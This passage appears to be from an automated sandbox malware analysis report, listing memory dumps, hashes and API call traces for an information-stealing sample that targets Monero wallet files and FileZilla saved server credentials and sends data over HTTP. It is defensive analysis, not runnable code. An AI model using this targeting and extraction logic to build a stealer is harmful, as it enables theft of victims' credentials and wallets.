                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2643c13dee63941cf5c88a7475369a35b088a7d4518b71b9fad2cffc1e2df77d
                        • Instruction ID: 4456b1bc2aeeac873a80fbd808569ab0a9c605d6a733311cf4f61521033f1c84
                        • Opcode Fuzzy Hash: 2643c13dee63941cf5c88a7475369a35b088a7d4518b71b9fad2cffc1e2df77d
                        • Instruction Fuzzy Hash: E08127B3A093109BE3045E2DDD4536BF7E6EFD4720F1A853DE6C883744EA7998058693
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2706e5b7aae559a7dd691e35a710eca22c78ff69b64e1f64167963c6ebedd5de
                        • Instruction ID: aaafc6f8cc3943f6a34c34b11e469b7a05357a7aebf5dabfbe745cb714b9d457
                        • Opcode Fuzzy Hash: 2706e5b7aae559a7dd691e35a710eca22c78ff69b64e1f64167963c6ebedd5de
                        • Instruction Fuzzy Hash: 2261F1F36087049BD304AE2DDCC577ABBE4EF54320F06462CEAD587784EA3558048697
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9c5bf49f493a99c37d6a1e000c05059ab9f9a35e90c0cbf57a5839a11ec6a461
                        • Instruction ID: bbe196d7b76983614b937640491e996a57d9ce4f65bb66dcf100094bba541e77
                        • Opcode Fuzzy Hash: 9c5bf49f493a99c37d6a1e000c05059ab9f9a35e90c0cbf57a5839a11ec6a461
                        • Instruction Fuzzy Hash: C95127B3A0C2049FE3046E29EC8173AFBE5EF59320F16463DE6D987380EA3658458757
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb64c62ad22b9a53b33cd231357bd54c343c3209c136f9b745d523e0024bead7
                        • Instruction ID: 99f840dd510fcf3edd1a41d8e2e3dccdd3ff6dc2ea518384b4cd210a49af2043
                        • Opcode Fuzzy Hash: fb64c62ad22b9a53b33cd231357bd54c343c3209c136f9b745d523e0024bead7
                        • Instruction Fuzzy Hash: 7C41D2F36087005FE7046E6AECC5B7EFBE9EBD4720F5A883EE28483744E97448458656
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d5161c4c1d631052cd7a8c41cc87cc05bae5a67441746f4b66338929b015bf2c
                        • Instruction ID: 75660c2b532650fa30a8a55f78671d2168437f5e240da1de2e2327d8fd0d7f2e
                        • Opcode Fuzzy Hash: d5161c4c1d631052cd7a8c41cc87cc05bae5a67441746f4b66338929b015bf2c
                        • Instruction Fuzzy Hash: EA3160B290D324AFE310BE68D84167AF7E8EF88750F16482EE6D4C7200D6355840CBD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 511fc4f91e6805470c349973e317286be802cf204b46b8d48e757bfae63a9648
                        • Instruction ID: 1086aca5d943344e890dc727df59b5d4996722c7ea509d9cee175a4801b69857
                        • Opcode Fuzzy Hash: 511fc4f91e6805470c349973e317286be802cf204b46b8d48e757bfae63a9648
                        • Instruction Fuzzy Hash: AD215AB250C304DFE305BF69DC856AEFBE6EF98710F16892DD6D582610E73598408A47
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F18E0B
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F099EC
                          • Part of subcall function 00F099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F09A11
                          • Part of subcall function 00F099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F09A31
                          • Part of subcall function 00F099C0: ReadFile.KERNEL32(000000FF,?,00000000,00F0148F,00000000), ref: 00F09A5A
                          • Part of subcall function 00F099C0: LocalFree.KERNEL32(00F0148F), ref: 00F09A90
                          • Part of subcall function 00F099C0: CloseHandle.KERNEL32(000000FF), ref: 00F09A9A
                          • Part of subcall function 00F18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F18E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00F20DBA,00F20DB7,00F20DB6,00F20DB3), ref: 00F10362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F10369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00F10385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F10393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00F103CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F103DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00F10419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F10427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00F10463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F10475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F10502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F1051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F10532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F1054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00F10562
                        • lstrcat.KERNEL32(?,profile: null), ref: 00F10571
                        • lstrcat.KERNEL32(?,url: ), ref: 00F10580
                        • lstrcat.KERNEL32(?,00000000), ref: 00F10593
                        • lstrcat.KERNEL32(?,00F21678), ref: 00F105A2
                        • lstrcat.KERNEL32(?,00000000), ref: 00F105B5
                        • lstrcat.KERNEL32(?,00F2167C), ref: 00F105C4
                        • lstrcat.KERNEL32(?,login: ), ref: 00F105D3
                        • lstrcat.KERNEL32(?,00000000), ref: 00F105E6
                        • lstrcat.KERNEL32(?,00F21688), ref: 00F105F5
                        • lstrcat.KERNEL32(?,password: ), ref: 00F10604
                        • lstrcat.KERNEL32(?,00000000), ref: 00F10617
                        • lstrcat.KERNEL32(?,00F21698), ref: 00F10626
                        • lstrcat.KERNEL32(?,00F2169C), ref: 00F10635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F20DB2), ref: 00F1068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 4a16b61db87c223ca102430091261811bc593c752186c311e4e02b9b1f2e8e86
                        • Instruction ID: 6107d5ac8c7954cf06a1cbee1b5867f4f3176e81a316408672bb4bcb8437c29f
                        • Opcode Fuzzy Hash: 4a16b61db87c223ca102430091261811bc593c752186c311e4e02b9b1f2e8e86
                        • Instruction Fuzzy Hash: F1D16F75941108ABDB14EBF0ED96EEE7738FF14711F404428F113A7085EE78AA86EB61
                        APIs
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F04839
                          • Part of subcall function 00F047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F04849
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F059F8
                        • StrCmpCA.SHLWAPI(?,008AF278), ref: 00F05A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F05B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,008AF328,00000000,?,008AAF70,00000000,?,00F21A1C), ref: 00F05E71
                        • lstrlen.KERNEL32(00000000), ref: 00F05E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00F05E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F05E9A
                        • lstrlen.KERNEL32(00000000), ref: 00F05EAF
                        • lstrlen.KERNEL32(00000000), ref: 00F05ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F05EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00F05F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F05F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00F05F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00F05FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00F05FBD
                        • HttpOpenRequestA.WININET(00000000,008AF258,?,008AE690,00000000,00000000,00400100,00000000), ref: 00F05BF8
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                        • InternetCloseHandle.WININET(00000000), ref: 00F05FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: 91e64e35f98ab3518a3ebc5980fed7e24923ac5ab14aa5546dc942e0ecdbe567
                        • Instruction ID: 837bdf136a1ca50f189e23ab2d4df1b0c5f76f0fda57bb8794af2a22b7d3413b
                        • Opcode Fuzzy Hash: 91e64e35f98ab3518a3ebc5980fed7e24923ac5ab14aa5546dc942e0ecdbe567
                        • Instruction Fuzzy Hash: 7E122F71821118ABDB15EBA0DC95FEEB378BF14710F4041A9B10663091EF786BCAEF65
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F18B60: GetSystemTime.KERNEL32(00F20E1A,008AAD30,00F205AE,?,?,00F013F9,?,0000001A,00F20E1A,00000000,?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F18B86
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F0CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F0D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F0D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D208
                        • lstrcat.KERNEL32(?,00F21478), ref: 00F0D217
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D22A
                        • lstrcat.KERNEL32(?,00F2147C), ref: 00F0D239
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D24C
                        • lstrcat.KERNEL32(?,00F21480), ref: 00F0D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D26E
                        • lstrcat.KERNEL32(?,00F21484), ref: 00F0D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D290
                        • lstrcat.KERNEL32(?,00F21488), ref: 00F0D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D2B2
                        • lstrcat.KERNEL32(?,00F2148C), ref: 00F0D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D2D4
                        • lstrcat.KERNEL32(?,00F21490), ref: 00F0D2E3
                          • Part of subcall function 00F1A820: lstrlen.KERNEL32(00F04F05,?,?,00F04F05,00F20DDE), ref: 00F1A82B
                          • Part of subcall function 00F1A820: lstrcpy.KERNEL32(00F20DDE,00000000), ref: 00F1A885
                        • lstrlen.KERNEL32(?), ref: 00F0D32A
                        • lstrlen.KERNEL32(?), ref: 00F0D339
                          • Part of subcall function 00F1AA70: StrCmpCA.SHLWAPI(008A98B0,00F0A7A7,?,00F0A7A7,008A98B0), ref: 00F1AA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 00F0D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                         • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
